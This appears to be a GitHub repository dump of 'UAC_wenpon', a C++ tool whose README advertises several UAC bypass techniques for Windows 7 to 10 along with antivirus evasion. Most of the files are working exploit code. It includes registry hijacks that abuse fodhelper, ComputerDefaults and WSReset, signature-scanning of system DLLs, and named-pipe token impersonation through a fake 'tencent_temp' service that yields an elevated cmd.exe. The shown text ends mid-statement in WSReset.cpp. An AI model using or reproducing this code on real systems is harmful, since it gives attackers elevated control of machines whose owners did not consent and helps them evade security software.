├── cmstp.cpp ├── stdafx.h ├── display.png ├── targetver.h ├── Fodhelper.h ├── WSReset.h ├── README.md ├── IIEAdmin.h ├── Security Center.h ├── ComputerDefaults.h ├── Cmstp.h ├── priv.h ├── ComputerDefaults.cpp ├── Fodhelper.cpp ├── TokenSteal.h ├── UAC_wenpon.sln ├── UAC_wenpon.cpp ├── .gitattributes ├── UAC_wenpon.vcxproj.filters ├── priv.cpp ├── WSReset.cpp ├── TokenSteal.cpp ├── .gitignore ├── UAC_wenpon.vcxproj ├── Security Center.cpp └── IIEAdmin.cpp /cmstp.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/cmstp.cpp -------------------------------------------------------------------------------- /stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/stdafx.h -------------------------------------------------------------------------------- /display.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/display.png -------------------------------------------------------------------------------- /targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/targetver.h -------------------------------------------------------------------------------- /Fodhelper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | int Fodhelper(char* arg); -------------------------------------------------------------------------------- /WSReset.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int WSReset(char* arg); -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # UAC_wenpon 2 | UAC_wenpon 3 | 4 | > 包含常用的几种UAC bypass技术，win7-win10 ,同时拥有一定的bypass 杀软的能力。 5 | 6 | ![RUNOOB 图标](https://github.com/scareing/UAC_wenpon/blob/91d5935c461ddab0ab26ca6d09e292639ec6da0a/display.png) 7 | 8 | -------------------------------------------------------------------------------- /IIEAdmin.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int IIEAdmin(char* arg); -------------------------------------------------------------------------------- /Security Center.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | //#pragma comment(lib,"comsuppw.lib") 10 | 11 | int Security_Center(char* arg); -------------------------------------------------------------------------------- /ComputerDefaults.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | //#pragma comment(lib,"Advapi32.lib") 6 | //#pragma comment(lib,"Shell32.lib") 7 | //#pragma comment(lib,"User32.lib") 8 | //#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") 9 | 10 | int ComputerDefaults(char* arg); -------------------------------------------------------------------------------- /Cmstp.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "stdafx.h" 4 | #include 5 | #include "windows.h" 6 | #include "winternl.h" 7 | #include 8 | #include "priv.h" 9 | #include 10 | #include 11 | 12 | #pragma comment(lib,"Advapi32.lib") 13 | #pragma comment(lib,"Shell32.lib") 14 | #pragma comment(lib,"Ole32.lib") 15 | 16 | using namespace std; 17 | 18 | 19 | int Cmstp(char* arg, char* arg2); -------------------------------------------------------------------------------- /priv.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef PRIV_AAAAAAAAAAAAA 4 | #define PRIV_AAAAAAAAAAAAA 5 | 6 | 7 | #include "windows.h" 8 | 9 | 10 | VOID fn_start_service(); 11 | VOID fn_delete_service(); 12 | INT fn_create_service(); 13 | INT fn_create_process(LPWSTR lpFileName, LPCWSTR lpParam); 14 | HANDLE fn_backup_token(); 15 | VOID fn_adjust_token_privilege(HANDLE& hNewThreadToken); 16 | INT fn_impersonate_via_namepipe(); 17 | 18 | 19 | #endif#pragma once 20 | -------------------------------------------------------------------------------- /ComputerDefaults.cpp: -------------------------------------------------------------------------------- 1 | #include "ComputerDefaults.h" 2 | int ComputerDefaults(char* arg) 3 | { 4 | 5 | PROCESS_INFORMATION pi = { 0 }; 6 | STARTUPINFOA si = { 0 }; 7 | HKEY hKey; 8 | HKEY hKey2; 9 | char* secret = arg; 10 | 11 | si.cb = sizeof(STARTUPINFO); 12 | si.wShowWindow = SW_HIDE; 13 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn\\Shell\\Open\\command", &hKey); 14 | RegSetValueExA(hKey, "", 0, REG_SZ, (LPBYTE)secret, strlen(secret)); 15 | RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (LPBYTE)"", sizeof("")); 16 | 17 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\CurVer", &hKey2); 18 | RegSetValueExA(hKey2, "", 0, REG_SZ, (LPBYTE)".pwn", strlen(".pwn")); 19 | ShellExecuteA(NULL, "open", (LPCSTR)"C:\\Windows\\System32\\ComputerDefaults.exe", NULL, NULL, SW_SHOW); 20 | Sleep(1000); 21 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings"); 22 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn"); 23 | 24 | return 0; 25 | } -------------------------------------------------------------------------------- /Fodhelper.cpp: -------------------------------------------------------------------------------- 1 | #include "Fodhelper.h" 2 | 3 | int Fodhelper(char* arg) { 4 | 5 | PROCESS_INFORMATION pi = { 0 }; 6 | STARTUPINFOA si = { 0 }; 7 | HKEY hKey; 8 | HKEY hKey2; 9 | char* secret = arg; 10 | 11 | 12 | 13 | si.cb = sizeof(STARTUPINFO); 14 | si.wShowWindow = SW_HIDE; 15 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn\\Shell\\Open\\command", &hKey); 16 | RegSetValueExA(hKey, "", 0, REG_SZ, (LPBYTE)secret, strlen(secret)); 17 | RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (LPBYTE)"", sizeof("")); 18 | 19 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\CurVer", &hKey2); 20 | RegSetValueExA(hKey2, "", 0, REG_SZ, (LPBYTE)".pwn", strlen(".pwn")); 21 | 22 | CreateProcessA("C:\\Windows\\System32\\cmd.exe", (LPSTR)"/c C:\\Windows\\System32\\fodhelper.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &si, &pi); 23 | Sleep(1000); 24 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings"); 25 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn"); 26 | return 0; 27 | } -------------------------------------------------------------------------------- /TokenSteal.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | void Error( 14 | _In_ DWORD lastError 15 | ); 16 | 17 | DWORD FindPid( 18 | _In_ std::wstring imageName 19 | ); 20 | 21 | BOOL SetPrivilege( 22 | _In_ HANDLE hToken, // access token handle 23 | _In_ LPCTSTR lpszPrivilege, // name of privilege to enable/disable 24 | _In_ BOOL bEnablePrivilege // to enable or disable privilege 25 | ); 26 | 27 | bool UnhookDll( 28 | _In_ std::string dllPath 29 | ); 30 | 31 | typedef BOOL(WINAPI* pMiniDumpWriteDump) 32 | ( 33 | HANDLE hProcess, 34 | DWORD ProcessId, 35 | HANDLE hFile, 36 | MINIDUMP_TYPE DumpType, 37 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, 38 | PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, 39 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam 40 | ); 41 | 42 | 43 | namespace RAII 44 | { 45 | class Handle 46 | { 47 | public: 48 | Handle(HANDLE inputHandle); 49 | ~Handle(); 50 | HANDLE GetHandle(); 51 | 52 | private: 53 | HANDLE _internalHandle; 54 | }; 55 | 56 | class Hmodule 57 | { 58 | public: 59 | Hmodule(HMODULE inputHmodule); 60 | ~Hmodule(); 61 | HMODULE GetHmodule(); 62 | 63 | private: 64 | HMODULE _internalHmodule; 65 | }; 66 | }; 67 | 68 | 69 | int TokenSteal(char* arg, char* arg2); -------------------------------------------------------------------------------- /UAC_wenpon.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31424.327 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UAC_wenpon", "UAC_wenpon.vcxproj", "{98546E43-50E2-400B-B7DC-215205D045E7}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x64.ActiveCfg = Debug|x64 17 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x64.Build.0 = Debug|x64 18 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x86.ActiveCfg = Debug|Win32 19 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x86.Build.0 = Debug|Win32 20 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x64.ActiveCfg = Release|x64 21 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x64.Build.0 = Release|x64 22 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x86.ActiveCfg = Release|Win32 23 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {D6ABA1AF-B734-43AF-B85A-3A70BBF67A1D} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /UAC_wenpon.cpp: -------------------------------------------------------------------------------- 1 | // UAC_wenpon.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 2 | // 3 | 4 | #include "ComputerDefaults.h" 5 | #include "Fodhelper.h" 6 | #include "Cmstp.h" 7 | #include "IIEAdmin.h" 8 | #include "Security Center.h" 9 | #include "WSReset.h" 10 | #include "TokenSteal.h" 11 | 12 | 13 | 14 | 15 | void usage() { 16 | HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE), hHijackEvent = NULL, hDeleteEvent = NULL; 17 | SetConsoleTextAttribute(hConsole, FOREGROUND_RED); 18 | printf("\n BypassUac by Scareing \n"); 19 | printf("\n uac.exe id calc or uac.exe id cmd \"/c calc\" \n"); 20 | printf("\n ID 1: Fodhelper \n"); 21 | printf("\n ID 2: ComputerDefaults \n"); 22 | printf("\n ID 3: Cmstp \n"); 23 | printf("\n ID 4: IIEObject \n"); 24 | printf("\n ID 5: Security_Center \n"); 25 | printf("\n ID 6: WSReset \n"); 26 | printf("\n ID 7: TokenSteal \n"); 27 | SetConsoleTextAttribute(hConsole, BACKGROUND_BLUE); 28 | 29 | } 30 | 31 | int main(int argc, char** argv) 32 | { 33 | 34 | 35 | 36 | if (argc < 3) 37 | { 38 | //PRINT_USAGE(); 39 | usage(); 40 | return -1; 41 | } 42 | 43 | int choose = atoi(argv[1]); 44 | char* arge = argv[2]; 45 | 46 | switch (choose) { 47 | case 1: { 48 | Fodhelper(arge); 49 | break; 50 | } 51 | case 2: { 52 | ComputerDefaults(arge); 53 | break; 54 | } 55 | case 3: { 56 | if (argc < 4) 57 | { 58 | //PRINT_USAGE(); 59 | printf("\n uac.exe number cmd \"/c calc\" \n"); 60 | //usage(); 61 | return -1; 62 | } 63 | char* arge2 = argv[3]; 64 | Cmstp(arge, arge2); 65 | break; 66 | } 67 | case 4: { 68 | IIEAdmin(arge); 69 | break; 70 | } 71 | case 5: { 72 | Security_Center(arge); 73 | break; 74 | } 75 | case 6: { 76 | WSReset(arge); 77 | break; 78 | } 79 | case 7: { 80 | 81 | char* arge2 = argv[3]; 82 | TokenSteal(arge, arge2); 83 | break; 84 | } 85 | } 86 | 87 | } 88 | 89 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /UAC_wenpon.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | 头文件 23 | 24 | 25 | 源文件 26 | 27 | 28 | 源文件 29 | 30 | 31 | 源文件 32 | 33 | 34 | 源文件 35 | 36 | 37 | 源文件 38 | 39 | 40 | 源文件 41 | 42 | 43 | 源文件 44 | 45 | 46 | 源文件 47 | 48 | 49 | 50 | 51 | 头文件 52 | 53 | 54 | 头文件 55 | 56 | 57 | 头文件 58 | 59 | 60 | 头文件 61 | 62 | 63 | 头文件 64 | 65 | 66 | 头文件 67 | 68 | 69 | 头文件 70 | 71 | 72 | 头文件 73 | 74 | 75 | 头文件 76 | 77 | 78 | -------------------------------------------------------------------------------- /priv.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include "priv.h" 3 | 4 | 5 | 6 | INT fn_create_process(LPWSTR lpFileName, LPCWSTR lpParam) { 7 | 8 | lstrcat(lpFileName, (LPCWSTR)" "); 9 | lstrcat(lpFileName, lpParam); 10 | 11 | STARTUPINFO si; 12 | PROCESS_INFORMATION pi; 13 | 14 | ZeroMemory(&si, sizeof(si)); 15 | ZeroMemory(&pi, sizeof(pi)); 16 | 17 | 18 | si.cb = sizeof(si); 19 | si.wShowWindow = SW_HIDE; 20 | si.dwFlags = STARTF_USESHOWWINDOW; 21 | CreateProcess(NULL, lpFileName, NULL, NULL, 0, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); 22 | 23 | WaitForSingleObject(pi.hProcess, 0); 24 | CloseHandle(pi.hProcess); 25 | CloseHandle(pi.hThread); 26 | 27 | return TRUE; 28 | 29 | } 30 | 31 | 32 | 33 | 34 | 35 | VOID fn_start_service() { 36 | 37 | LPWSTR lpCmdPath = new WCHAR[MAX_PATH]; 38 | GetSystemDirectory(lpCmdPath, MAX_PATH); 39 | lstrcat(lpCmdPath, L"\\cmd.exe /c"); 40 | fn_create_process(lpCmdPath, L"net start tencent_temp"); 41 | 42 | } 43 | 44 | 45 | VOID fn_delete_service() { 46 | 47 | LPWSTR lpCmdPath = new WCHAR[MAX_PATH]; 48 | GetSystemDirectory(lpCmdPath, MAX_PATH); 49 | lstrcat(lpCmdPath, L"\\cmd.exe /c"); 50 | fn_create_process(lpCmdPath, L"net stop tencent_temp"); 51 | fn_create_process(lpCmdPath, L"sc delete tencent_temp"); 52 | 53 | } 54 | 55 | 56 | 57 | 58 | HANDLE fn_backup_token() { 59 | 60 | HANDLE hThreadToken = NULL; 61 | HANDLE hNewThreadToken = NULL; 62 | 63 | if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hThreadToken)) { 64 | return FALSE; 65 | } 66 | if (!DuplicateTokenEx(hThreadToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hNewThreadToken)) { 67 | return FALSE; 68 | } 69 | 70 | CloseHandle(hThreadToken); 71 | return hNewThreadToken; 72 | 73 | } 74 | 75 | 76 | VOID fn_adjust_token_privilege(HANDLE& hNewThreadToken) { 77 | 78 | TOKEN_PRIVILEGES tp = { 0 }; 79 | //TOKEN_PRIVILEGES *tp = (TOKEN_PRIVILEGES*)new unsigned char[sizeof(TOKEN_PRIVILEGES) * 2]; 80 | LUID lUID, lUID2; 81 | ZeroMemory(&tp, sizeof(tp)); 82 | LookupPrivilegeValue(NULL, L"SeIncreaseQuotaPrivilege", &lUID); 83 | LookupPrivilegeValue(NULL, L"SeAssignPrimaryTokenPrivilege", &lUID2); 84 | 85 | tp.PrivilegeCount = 2; 86 | tp.Privileges[0].Luid = lUID; 87 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 88 | tp.Privileges[1].Luid = lUID2; 89 | tp.Privileges[1].Attributes = SE_PRIVILEGE_ENABLED; 90 | 91 | //tp->PrivilegeCount = 2; 92 | //tp->Privileges[0].Luid = lUID; 93 | //tp->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 94 | //tp->Privileges[1].Luid = lUID2; 95 | //tp->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED; 96 | 97 | AdjustTokenPrivileges(hNewThreadToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); 98 | //AdjustTokenPrivileges(hNewThreadToken, FALSE, tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); 99 | } 100 | 101 | 102 | 103 | INT fn_impersonate_via_namepipe() { 104 | 105 | 106 | LPSTR lpReadBuffer = new CHAR[MAX_PATH]; 107 | DWORD dwRealReadLen = 0; 108 | // ReadFile param 109 | 110 | STARTUPINFO si; 111 | PROCESS_INFORMATION pi; 112 | ZeroMemory(&si, sizeof(si)); 113 | ZeroMemory(&pi, sizeof(pi)); 114 | si.cb = sizeof(si); 115 | //si.wShowWindow = SW_HIDE; 116 | //si.dwFlags = STARTF_USESHOWWINDOW; 117 | //CreateProcess param 118 | 119 | 120 | LPCWSTR lpNamePipe = L"\\\\.\\pipe\\rabbit"; 121 | HANDLE hNamePipe = CreateNamedPipe(lpNamePipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL); 122 | 123 | while (hNamePipe != INVALID_HANDLE_VALUE) { 124 | 125 | fn_start_service(); 126 | if (ConnectNamedPipe(hNamePipe, NULL) != FALSE) { 127 | break; 128 | } 129 | } 130 | 131 | ReadFile(hNamePipe, lpReadBuffer, MAX_PATH, &dwRealReadLen, NULL); // must read byte from namepipe handle before impersonate 132 | if (!ImpersonateNamedPipeClient(hNamePipe)) { 133 | return FALSE; 134 | } 135 | 136 | //backup caller token. impersonate token convert primary token. 137 | HANDLE hNewThreadToken = fn_backup_token(); 138 | if (hNewThreadToken != FALSE) { 139 | BOOL bRet = CreateProcessWithTokenW(hNewThreadToken, LOGON_NETCREDENTIALS_ONLY, NULL, (LPWSTR)L"cmd.exe", NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi); 140 | // not require any privilege. if CreateProcessWithTokens fails. adjust token privilege then use CreateProcessAsUser. 141 | if (!bRet) { 142 | fn_adjust_token_privilege(hNewThreadToken); 143 | CreateProcessAsUser(hNewThreadToken, NULL, (LPWSTR)L"cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); 144 | } 145 | 146 | 147 | } 148 | 149 | CloseHandle(hNewThreadToken); 150 | RevertToSelf(); 151 | DisconnectNamedPipe(hNamePipe); 152 | CloseHandle(hNamePipe); 153 | return TRUE; 154 | 155 | } 156 | 157 | 158 | 159 | 160 | 161 | INT fn_create_service() { 162 | 163 | //because stop/delete service is not intercept by anti-virus. so stop/delete opertion is apply commandline. 164 | SC_HANDLE hSCM = NULL; 165 | SC_HANDLE hService = NULL; 166 | LPCWSTR lpServiceName = L"tencent_temp"; 167 | LPCWSTR lpBinPath = L"c:\\windows\\system32\\cmd.exe /c echo tencent > \\\\.\\pipe\\rabbit"; 168 | 169 | hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); 170 | if (hSCM == NULL) 171 | return FALSE; 172 | 173 | 174 | hService = CreateService(hSCM, lpServiceName, lpServiceName, 175 | SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, 176 | lpBinPath, NULL, NULL, NULL, NULL, NULL); 177 | if (hService == NULL) { 178 | CloseServiceHandle(hSCM); 179 | return FALSE; 180 | } 181 | 182 | CloseServiceHandle(hService); 183 | CloseServiceHandle(hSCM); 184 | 185 | return TRUE; 186 | 187 | } 188 | 189 | 190 | 191 | -------------------------------------------------------------------------------- /WSReset.cpp: -------------------------------------------------------------------------------- 1 | #include "WSReset.h" 2 | 3 | using UserAssocSetPtr = void(WINAPI*)(int unknown0, PCWCHAR fileType, PCWCHAR progId); 4 | using UserAssocSetInternalPtr = HRESULT(WINAPI*)(void* unused0, PCWCHAR fileType, PCWCHAR progId, int unknown0); 5 | 6 | const BYTE SIGNATURE_NT10[] = { 7 | 0x48, 0x8B, 0xC4, 0x55, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0x68, 0xA1, 0x48, 0x81, 0xEC, 0xA0, 8 | 0x00, 0x00, 0x00, 0x48, 0xC7, 0x45, 0xEF, 0xFE, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x20 9 | }; 10 | 11 | const BYTE SIGNATURE_NT6X[] = { 12 | 0x48, 0x89, 0x5C, 0x24, 0x08, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0xFE, 0xFF, 13 | 0xFF, 0x48, 0x81, 0xEC, 0x80, 0x02, 0x00, 0x00 14 | }; 15 | 16 | template 17 | T LocateSignature(const BYTE signature[], const int signatureSize, const char* sectionName, const HMODULE moduleHandle) 18 | { 19 | auto* headers = reinterpret_cast(reinterpret_cast(moduleHandle) + reinterpret_cast< 20 | PIMAGE_DOS_HEADER>(moduleHandle)->e_lfanew); 21 | auto* sectionHeader = IMAGE_FIRST_SECTION(headers); 22 | 23 | while (std::strcmp(sectionName, reinterpret_cast(sectionHeader->Name)) != 0) 24 | sectionHeader++; 25 | 26 | for (auto* i = reinterpret_cast(moduleHandle) + sectionHeader->VirtualAddress; i != reinterpret_cast< 27 | PUCHAR>(moduleHandle) + sectionHeader->VirtualAddress + sectionHeader->SizeOfRawData - signatureSize; i++ 28 | ) 29 | { 30 | if (std::memcmp(signature, i, signatureSize) == 0) 31 | return reinterpret_cast(i); 32 | } 33 | 34 | return reinterpret_cast(nullptr); 35 | } 36 | 37 | struct RegistryEntry 38 | { 39 | explicit RegistryEntry(const wchar_t* path, const wchar_t* deletePath) : DeletePath(deletePath) 40 | { 41 | Status = RegCreateKeyExW(HKEY_CURRENT_USER, path, 0, nullptr, REG_OPTION_NON_VOLATILE, 42 | KEY_SET_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | DELETE, nullptr, 43 | &Handle, nullptr); 44 | } 45 | 46 | ~RegistryEntry() 47 | { 48 | RegCloseKey(Handle); 49 | RegDeleteTreeW(HKEY_CURRENT_USER, DeletePath); 50 | } 51 | 52 | LSTATUS SetValue(const wchar_t* valueName, const PVOID valueData, const DWORD valueSize) const 53 | { 54 | return RegSetValueExW(Handle, valueName, 0, REG_SZ, static_cast(valueData), valueSize); 55 | } 56 | 57 | LSTATUS GetStatus() const 58 | { 59 | return Status; 60 | } 61 | 62 | private: 63 | HKEY Handle{}; 64 | LSTATUS Status; 65 | const wchar_t* DeletePath; 66 | }; 67 | 68 | int WSReset(char* arg) 69 | { 70 | char* secret = arg; 71 | auto nt10{ false }; 72 | 73 | if (*reinterpret_cast(0x7FFE026C) == 10) 74 | nt10 = true; 75 | else if (*reinterpret_cast(0x7FFE026C) == 6 && *reinterpret_cast(0x7FFE0270) < 2) 76 | { 77 | std::wcout << L"OS not supported.\n"; 78 | return EXIT_FAILURE; 79 | } 80 | 81 | PWSTR systemPath; 82 | auto hr = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath); 83 | if (FAILED(hr)) 84 | { 85 | std::wcout << L"SHGetKnownFolderPath() failed. HRESULT: 0x" << std::hex << hr << std::endl; 86 | return EXIT_FAILURE; 87 | } 88 | bstr_t b(secret); 89 | WCHAR* x = b; 90 | //std::wstring cmdLoc{ systemPath }; 91 | //CoTaskMemFree(systemPath); 92 | //cmdLoc += L"\\cmd.exe /C \"start cmd.exe\""; 93 | 94 | const RegistryEntry progId{ 95 | L"SOFTWARE\\Classes\\scareing\\shell\\open\\command", L"SOFTWARE\\Classes\\scareing" 96 | }; 97 | if (progId.GetStatus()) 98 | { 99 | std::wcout << L"RegCreateKeyExW() failed. LSTATUS: " << progId.GetStatus() << std::endl; 100 | return EXIT_FAILURE; 101 | } 102 | 103 | const auto status = progId.SetValue(nullptr, x, wcslen(x) * 2 + 2); 104 | if (status) 105 | { 106 | std::wcout << L"RegSetValueExW() failed. LSTATUS: " << status << std::endl; 107 | return EXIT_FAILURE; 108 | } 109 | 110 | hr = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY); 111 | if (FAILED(hr)) 112 | { 113 | std::wcout << L"CoInitializeEx() failed. HRESULT: 0x" << std::hex << hr << std::endl; 114 | return EXIT_FAILURE; 115 | } 116 | 117 | if (nt10) 118 | { 119 | const auto UserAssocSetInternal = LocateSignature( 120 | SIGNATURE_NT10, sizeof SIGNATURE_NT10, ".text", 121 | LoadLibraryExW(L"SystemSettings.Handlers.dll", nullptr, LOAD_LIBRARY_SEARCH_SYSTEM32)); 122 | if (!UserAssocSetInternal) 123 | { 124 | CoUninitialize(); 125 | std::wcout << L"SystemSettings.Handlers.dll!UserAssocSet->\"Internal\" not found.\n"; 126 | return EXIT_FAILURE; 127 | } 128 | UserAssocSetInternal(nullptr, L"ms-windows-store", L"scareing", 1); 129 | } 130 | else 131 | { 132 | const auto UserAssocSet = LocateSignature(SIGNATURE_NT6X, sizeof SIGNATURE_NT6X, ".text", 133 | LoadLibraryExW(L"shell32.dll", nullptr, LOAD_LIBRARY_SEARCH_SYSTEM32)); 134 | if (!UserAssocSet) 135 | { 136 | CoUninitialize(); 137 | std::wcout << L"shell32.dll!UserAssocSet not found.\n"; 138 | return EXIT_FAILURE; 139 | } 140 | UserAssocSet(2, L"ms-windows-store", L"scareing"); 141 | } 142 | 143 | CoUninitialize(); 144 | 145 | SHELLEXECUTEINFOW info{ 146 | sizeof SHELLEXECUTEINFOW, SEE_MASK_NOCLOSEPROCESS | SEE_MASK_UNICODE, nullptr, L"open", L"wsreset.exe", nullptr, 147 | nullptr, SW_HIDE, nullptr, nullptr, nullptr, nullptr, NULL, nullptr, nullptr 148 | }; 149 | 150 | if (!ShellExecuteExW(&info)) 151 | { 152 | std::wcout << L"ShellExecuteExW() failed. GetLastError(): " << GetLastError() << std::endl; 153 | return EXIT_FAILURE; 154 | } 155 | 156 | std::wcout << L"Waiting for WSReset.exe to exit . . .\n"; 157 | WaitForSingleObject(info.hProcess, INFINITE); 158 | CloseHandle(info.hProcess); 159 | RegDeleteTreeW( 160 | HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-windows-store"); 161 | 162 | auto* hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE); 163 | 164 | SetConsoleTextAttribute(hStdOutput, 14); 165 | std::wcout << L"["; 166 | SetConsoleTextAttribute(hStdOutput, 15); 167 | std::wcout 